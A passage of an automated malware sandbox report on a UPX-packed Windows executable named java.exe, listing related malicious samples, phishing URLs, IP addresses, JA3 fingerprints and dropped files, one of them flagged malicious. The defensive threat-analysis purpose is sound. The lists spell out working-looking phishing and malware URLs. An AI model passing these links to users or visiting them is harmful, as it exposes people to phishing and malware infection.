                                                                                                                                                              https://click.actmkt.com//s/052-31d3cd75-fa72-4087-91b5-f3abd4b30b2f?enr=naahiaduabyaa4yahiac6abpabraa3yamqahsadnabqqa4yaomagcadhabsqayyamuag4aduabsqa4qamqagkadmabuaa2iafyagsadoab6aazqameahmadpabzaaqaammagcadqabzqa5aan4ag4adfab2aayiaoiagiadjabzaa3qam4ac4addabxqa3iapqadcad4ab6aamaaguadeabnaazqamiamqadgaddabsaanyaguac2adgabqqanyagiac2abuaayaaoaag4ac2abzaayqayqaguac2adgaazqayiamiagiabuabraamyagaageabsabtaa7aagaadkabzaawqayyaguadeabzaazqamiaguadcabnabrqazaageadsabnaa2aamiagyadeabnaa4aamaaheagcabnabraamqageadaaddabsqaniagmagiadgaayqazaapqadaabqaayqaliameadcadeaa4qamqagiaggadfaawqaoaagyadgabwaawqanaag4ageabraawqayqagyagiadfaawqanqamyagcadbaazaaziagmagmadeaazaamyagyahyad4abaqa7aa====&mKnBM/FLvMOZbQt#/793969793969/bWVsaXNzYS5iZWxsQHB0LnFsZC5nb3YuYXUGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 167.99.186.218
                                                                                                                                                              http://etrjsff.pinkagencia.comGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 165.227.138.37
                                                                                                                                                              AKAMAI-ASUSpython.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                              • 23.54.200.159
                                                                                                                                                              2D5770EB59209D2238670233CB2BE6424F7974800B83F.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 23.192.229.164
                                                                                                                                                              3ZNRd52b3x.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 23.57.232.44
                                                                                                                                                              https://far-skateboard-ba2.notion.site/GAFFNEY-Electrical-Services-Pty-Ltd-4f330ac7f10f4d20a77520190e6fd06c?pvs=4%22)%20and%20ContentType:(%221%22)Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 23.49.5.148
                                                                                                                                                              yg8uZi8OUS.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                              • 104.84.231.73
                                                                                                                                                              kyQ6tISCd6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 2.17.183.135
                                                                                                                                                              vveZnyJj0e.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 125.56.147.156
                                                                                                                                                              2XcXiCaqz1.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 104.64.159.190
                                                                                                                                                              PO Request From Leonard Adams Insurance.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.84.231.227
                                                                                                                                                              http://googlechrome.com.cnGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 23.60.84.29
                                                                                                                                                              huhu.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 23.36.242.160
                                                                                                                                                              huhu.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 23.64.233.45
                                                                                                                                                              huhu.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 96.25.116.252
                                                                                                                                                              Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 23.54.200.159
                                                                                                                                                              SecuriteInfo.com.FileRepMalware.7801.14746.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.108.66.94
                                                                                                                                                              https://gtm.steamproxy.vip/market/Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 23.195.238.96
                                                                                                                                                              https://hr-a65.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2FpasswordGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 173.222.196.22
                                                                                                                                                              original.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 23.222.155.167
                                                                                                                                                              https://energyexplorationtech-my.sharepoint.com/:f:/g/personal/matthew_jordan_energyexplorationtech_onmicrosoft_com/Eutt63ri_fxJp-ldVsqBKcMBig5tJSIRYH8Jz2cCkpGq6A?e=jprcz0Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 23.194.100.10
                                                                                                                                                              OriginalMessage.txt.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 104.112.177.85

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              28a2c9bd18a11de089ef85a160da29e4python.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://ecv.microsoft.com/PvQb0AQbQ9Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://far-skateboard-ba2.notion.site/GAFFNEY-Electrical-Services-Pty-Ltd-4f330ac7f10f4d20a77520190e6fd06c?pvs=4%22)%20and%20ContentType:(%221%22)Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              SecuriteInfo.com.Trojan-Downloader.MSIL.Agent.29786.22815.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://cbiblec4me.com/svenska-tonaring-januari/?s=Vi&pvhem=7291&fbclid=IwAR0IJuMChf4diWNNNE_TVlaTVIj6q2oYBcrCU2ZjnsisQ53ajsuET3RHXPgGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://jp.mmerricari.com.yiyaodao.com/pc/index.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://cl7.fdttadtyu.pics/tWBxach3/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://cl3.fdttadtyu.pics/6oagaY3v/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://cl8.fdttadtyu.pics/mTaVSoo9/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://cl9.fdttaytyu.pics/GvD5PILg/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://cl6.tuygbtyui.pics/2NNEwCmQ/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://cl9.fdttadtyu.pics/Rpyj3JnM/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://cl7.tuygbtyui.pics/zoXMHadJ/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://jfwbgwiugeq2ohfqofh16.z13.web.core.windows.net/win/Get hashmaliciousGRQ ScamBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://cl8.tuygbtyui.pics/Wzj9UweA/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://kog.pages.dev/robots.txtGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://uiokkrtsghmr.pics/gTEfR8nB/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              View - (1)Fax.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://m25z98brt5vb2m93fi0p.storage.googleapis.com/m25z98brt5vb2m93fi0p-i#cl/9810_md/1110/6902/1803/54/981368Get hashmaliciousPhisherBrowse
                                                                                                                                                              • 173.222.162.32
                                                                                                                                                              https://m25z98brt5vb2m93fi0p.storage.googleapis.com/m25z98brt5vb2m93fi0p-uGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 173.222.162.32

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):82400
                                                                                                                                                              Entropy (8bit):5.7978449631526905
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:0oA2ul/D/Mb616FUFtWoA2iG/Dyqb61NBUFgK:+8UFqBUF3
                                                                                                                                                              MD5:51AA9F7524C37CD4FF3C1CB6485DD6C0
                                                                                                                                                              SHA1:A43B6A2F609684A1F0EBE1739C7264190A89DC54
                                                                                                                                                              SHA-256:1AD5A6217415DC4602ACC180CB886E13B613A7DAF188B3D5C5CE059C3D589B4A
                                                                                                                                                              SHA-512:B0252E62BEDB5771765E4C7FD574FBCD4BCD3EA83E211237DCBCA704F1E56F388045F8205D39EC14A22DF1BDDDC28A12C85E13F0AC48833A51D0E8C79266B728
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........m...e.eM.Q.T.f...3..........a.B...........v.............................................................................w.5.......^.......G.(.......>..............................................................................IA.,!Y...T...U..%.(P..x_exe_pathc:\users\user\desktop\officesetup.exeeC...@.,....4l..z..==Jy.;..hosteC..I?.,!Y..4l..z..==Jy.;..x_exe_pathc:\users\user\desktop\officesetup.exeeC...>.,......$s.A\.8|.vP.hosteC..<=.,.A....$s.A\.8|.vP.packageidmicrosoft.windows.explorereC..@<.,'A....$s.A\.8|.vP.windows_win32microsoft.windows.explorereC...;.,...C...?O..}-j:..hoste%<N<:.,.A.C...?O..}-j:..packageidmicrosoft.windows.explorere%<N@9.,'A.C...?O..}-j:..windows_win32microsoft.windows.explorere%<N.8.,.....g.,....r.....".y.@..hoste..B.f.,!K..r.....".y.@..x_exe_pathc:\users\user\desktop\java.exee.....C,....xX.%....^...._.hosteD.$....,..#..xX.%....^...._.packageid{6d809377-6af0-444b-8957-a3773f02200e}\adobe\acrobat dc\acrobat\acrobat.exeeD.$....,'.#..xX

                                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\XIYR6UZ0\www.bing[1].xml

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (45174), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):45182
                                                                                                                                                              Entropy (8bit):5.035762643577828
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:5MZG7xRKm1A1a/Qh/qLPvkc1mYyPdT9SWrRW:5LcrW
                                                                                                                                                              MD5:6BA6B68478FF5B7338BA6F984A7B9760
                                                                                                                                                              SHA1:E892E5DF7C4EF6C7852A821E00A5AB97B7E5F229
                                                                                                                                                              SHA-256:A2608837DBCD3D389F738B4163F0123D7A277BAE208108F8D8CD2F53AD8981F1
                                                                                                                                                              SHA-512:DBD715601693B18E5288345AB3EC1683C2A639C46E11E7B601A044E48AB20E33CCDA54ED4A6023999F1F806563963635CAD2DC03A84484A6BDE474A7390205FE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<root><item name="eventLogQueue_Online" value="[]" ltime="1452306022" htime="31083490" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1696333692425" ltime="2102739245" htime="31061487" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="2102740428" htime="31061487" /><item name="mdsb-v" value="8" ltime="2823990064" htime="31061487" /><item name="DSBMomentsCacheKey" value="{&quot;cacheTime&quot;:1696333765585,&quot;response&quot;:{&quot;SchemaVersion&quot;:&quot;1.1&quot;,&quot;ContentCollection&quot;:[{&quot;Date&quot;:&quot;20231003&quot;,&quot;Name&quot;:&quot;IOTD: WhitsundaySwirl&quot;,&quot;Order&quot;:1,&quot;IsMainColumnInLeft&quot;:true,&quot;Data&quot;:[{&quot;CardType&quot;:&quot;Hero&quot;,&quot;UXOrder&quot;:1,&quot;Cards&quot;:[{&quot;Scenario&quot;:&quot;ImageOfTheDay&quot;,&quot;UXTemplateName&quot;:&quot;DescriptiveHoverCard&quot;,&quot;FieldsStore&quot;:{&quot;Title&quot;:&quot;Whitehaven Beach, Whitsunday Island, Queen

                                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8e18939b-a40a-444b-9260-fe31534f298a}\0.0.filtertrie.intermediate.txt

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):37421
                                                                                                                                                              Entropy (8bit):4.611252091103942
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:6UjQxwcuyEZDqRKmJHGHly84yeiEaFHm2iLOOXYcc2jZ:b6y5U5Jkb4yej+vUOOoujZ
                                                                                                                                                              MD5:9BDE56D9C4532F269928C5CE1FF2560D
                                                                                                                                                              SHA1:FB816F6AAF8B7FF7CBB0B521A9D30BAA52CDDB7F
                                                                                                                                                              SHA-256:89DE51E447ED49F7748B3D9C077B97703629575241D5BE61EAB5D4196C6CECAD
                                                                                                                                                              SHA-512:DFB9548743887463AB6161D0972E6BB501BF4576D0CDAF1A7C7EE1E427DF59361BBD128D034AB45B68C8E48CA645022E39C5507A439074B30489E25F390760FF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:0.0....~.....~.....~.....~.....~.....~...~.....~.....~.....~.......~......~.......~.....~.....~.....~.....~......~.....~......~......~.......~.....~......~.....~.......~.......~......~.....~......~.......~.....~......~.....~.....~......~......~.....~......~.....~.............~.......~...md~...alc~..zune~..zord~..znip~..zip help~..zip file manager~..yourphone~..your phone~..yhis pc~..y pc~..y computer~..xxbox~..xox~..xontrol panel~..xonreol~..xnox~..xnipping~..xms~..xmd~..xls:wux:xls~..xhrome~..xcontrol~..xcmd~..xchrome~..xcalc~..xbxox~..xbv~..xbpx~..xboz~..xbox~..xboxx~..xboxc~..xbos~..xbop~..xboox~..xboix~..xboc~..xbob~..xbix~..xbb~..xamera~..xalc~..x86)~..x64)~..x box~..wyc~..wxcwl~..wxcel~..wword~..wsord~..wsnip~..wrord~..wrod~..wrodpad~..wqord~..wprd~..wprdpad~..wpord~..wowrd~..wotrd~..wotd~..wo

                                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8e18939b-a40a-444b-9260-fe31534f298a}\0.1.filtertrie.intermediate.txt

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5
                                                                                                                                                              Entropy (8bit):2.321928094887362
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Dy:W
                                                                                                                                                              MD5:34BD1DFB9F72CF4F86E6DF6DA0A9E49A
                                                                                                                                                              SHA1:5F96D66F33C81C0B10DF2128D3860E3CB7E89563
                                                                                                                                                              SHA-256:8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
                                                                                                                                                              SHA-512:E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:0.1..

                                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8e18939b-a40a-444b-9260-fe31534f298a}\0.2.filtertrie.intermediate.txt

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5
                                                                                                                                                              Entropy (8bit):2.321928094887362
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Ay:Ay
                                                                                                                                                              MD5:C204E9FAAF8565AD333828BEFF2D786E
                                                                                                                                                              SHA1:7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
                                                                                                                                                              SHA-256:D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
                                                                                                                                                              SHA-512:E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:0.2..

                                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8e18939b-a40a-444b-9260-fe31534f298a}\Apps.ft

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):50373
                                                                                                                                                              Entropy (8bit):3.7533011813000954
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:2crkq/9PYdKNAd1d0f41H1Ii0OyAAZXjLdk6nMUisfhteVoVPPP8qoEYhk5+6DC3:2ckq/1YdKNAd1d0f41H1Ii5yAAZXHdep
                                                                                                                                                              MD5:42C6CF763BC1DCEFD79C0E5262E7DFC4
                                                                                                                                                              SHA1:2EAA3A2B1557ED78CA1166EB007608137E52C343
                                                                                                                                                              SHA-256:99205F34B2E4960BE69575908CF5BC9C57A32A240105848EE998E1E79F240707
                                                                                                                                                              SHA-512:73B48317D927329B24F59C164CEA53D0A8AF6456F8CD8F93A285286696626E15B1E2BE286A39310D4772A6263D6AB43710A07392B501324732FADBF8F50DB487
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:................h...."cmd"~........A%..*aint~.........+r~........A,#A..A0..192~.........2016~........A3.A60A7.A[bAa,.b@..ck..d|(.e...f'..g*..h6..iq..j..AkG.l...m2..n~..o...p...q..Ar_.s...t>..u..Av.w...x...y..AzWB.RA..A.IC..UA......A.c..~........C.LA..C.(I..Cpre..run%~.........fetch%~.........ail~.........stsc~.........cmd~.........run~.........utlook~.........2-bit)~........Id.A ..~.........viewer~.........4-bit)~......... zip~........D-zip.Iz3A ..~........Ffile m..help~.........anager~.........fm~.........ip~........Aa..paint~.........int~.........omt~........CbouMAc.Ad.Ae..kype~........Al..mil~........An.Apa.rJ.As.At.Au..zure~.........t java~.........alc~........DcessS.ess~.........lc~.........md~.........on~.........robat~........G contro..s~.........~........Ol:wux:a.Occess c..ontrol~........Eapter%.b~........Ad"Cmin4Eobe a=Jva.F:wux:a..~.........dapter~........Fress b..~........Oook:wux.O:addres..s book~........E cmd:.Jis.Owux:adm..in cmd~........Otrative.. tools~........

                                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8e18939b-a40a-444b-9260-fe31534f298a}\Apps.index

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1126006
                                                                                                                                                              Entropy (8bit):6.147114410359821
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:AoLr7YfoyFxz8GfoLr7YfoyFxz8G21it:AMwf1xz8GfMwf1xz8G2
                                                                                                                                                              MD5:5665CA72FB1FE8FF993E1F56C8EDB387
                                                                                                                                                              SHA1:11C371B293397DEE3289435CC6F797110D5A631B
                                                                                                                                                              SHA-256:263D203F23A1E59D7FECA90148F7ED49333CD1CC607C58B4EEEDC1BF3A84F8C8
                                                                                                                                                              SHA-512:5601C99D230FC811D192E23B4537048A86200532CE5A402749FCF687BBC23DF2E52CC3E8597E79E94A4E7CCF8945C825EA2A7EB93DD9A1F2204F28501E7FDBA1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:Ej..D..WindowsSearch....Apps...name..gscore..lscore...market.spelling.fE.h...K........~<~i..'..uT..r..7.c..l.s..P.x..c.k....p....'..CR*a..Qn...a.,[.o2..t.u}.,{f.m.Q..e ;.w.0..l..(.y..P......gy..d.:&.i.;.[..n.b....j.z#.@.E.Q!..Q......N.Q/...`.z.Qh.7.f..+.4.. . ....v..L.8..Q6#.Q\..Qq.B.;.}..0....9...A5...X.Qz.H.7.'..%. .Q3.8.....Q21/...M.Q.kQ-..."""""""jo..&.I.Q+.uQ1j...j.a:..Ab...;b...Q...'.<...#?< ..a_C..b]<3../.<...Ae..t!...u...Qb...n....y._.Qj.{Ql =.p.S..m)o..k...Qo..Qh..Q;7CQi1..w2..Qf.2Qd8h.r....sE...a.<..cZ... \...z."..,me<ume.Q.z5Qxx.av>.*Q[@R.24<u 24.ig...At.Qnv.Q .'Qo0xae....yo<uetoDam"...k<ue k.Qs.0ab..=&i<ue i+..j<ue jhQd..Qr..Qc.`&p<ue p...a<ue a.&w<ue w..&f<ue f..&h<ue h...v<ue v.Ql..&.<ube....g<ue g....<uetoet<uet..TUh<uet..&u<ueto..&p<ueto..%y<uet..cr<u...Re<...i<uetoMa<...-o<eto...o(...o(...ter*et...ute.eute..luetjuey...st* ta..s<unes%e<unew..n<ueenfj<u....men+e n...t<uetbs<..X%j<uej...2<ue2M%b<ueb[.%g<ueg...h<ueh.%v<uev1.%c<uec..%p<uep6.%f<uef..j<uo...ue

                                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133502574394086727.txt (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):114941
                                                                                                                                                              Entropy (8bit):5.179500563537803
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
                                                                                                                                                              MD5:ED10444C46BD13DBDCC387D36132F171
                                                                                                                                                              SHA1:3E2D788FBFE3DD9472AE92F934A944343C9238F2
                                                                                                                                                              SHA-256:2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
                                                                                                                                                              SHA-512:0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":6,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340807447259E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"

                                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133502574394086727.txt.~tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):114941
                                                                                                                                                              Entropy (8bit):5.179500563537803
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
                                                                                                                                                              MD5:ED10444C46BD13DBDCC387D36132F171
                                                                                                                                                              SHA1:3E2D788FBFE3DD9472AE92F934A944343C9238F2
                                                                                                                                                              SHA-256:2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
                                                                                                                                                              SHA-512:0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":6,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340807447259E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"

                                                                                                                                                              C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):112768
                                                                                                                                                              Entropy (8bit):5.340092545821249
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:KiLOvRmmQegJfBbmAQ256/ZrwWnwqjhurmKFcxL8JQ2r0Eg:KiyvRmDLs/ZrwWJjAqGcRJ2hg
                                                                                                                                                              MD5:CC18A03FCBC9DCF9DF31B64689EB3E55
                                                                                                                                                              SHA1:A10BFE77CB47103B1D909BE2FF5A5F48BB476071
                                                                                                                                                              SHA-256:250D35E8D6E571820344432ADEF717F30BD011C94FE132E77F58994FAA268FE6
                                                                                                                                                              SHA-512:5E911E14F237B8BF1062F25F21436C6D7111C1589C068625E982DFFC26883F6429BE74AC13C3D713E25BC5DC960BD6EF4796F2CCE4FC1DAB3074B16E24AECB48
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L.....TT.............................Z............@.....................................................................................8...........................................................................................................UPX0....................................UPX1................................@....rsrc...............................@....imports............................@...........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                                                              Entropy (8bit):5.3400867518092765
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                                                                              • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                              File name:java.exe
                                                                                                                                                              File size:112'768 bytes
                                                                                                                                                              MD5:b471d5f706df69a4a28664d7e335a9da
                                                                                                                                                              SHA1:995a757d4562d9f4e8231f359b4b78db2de1c1f0
                                                                                                                                                              SHA256:223534841809356aa7c94f86e8b0f4d6b4ce317b8225b419b27a5ba320ab0b81
                                                                                                                                                              SHA512:2bfeba6b8aec4caafd508644f08d3a70de469485c0c4e5220c231f024b5b48c9058896bdb55d5faccda6fad51402b6c10ffdbe8cc0612bebad81cd214c8238c3
                                                                                                                                                              SSDEEP:1536:JiLOvRmmQegJfBbmAQ256/ZrwWnwqjhurmKFcxL8JQ2r0Eg:JiyvRmDLs/ZrwWJjAqGcRJ2hg
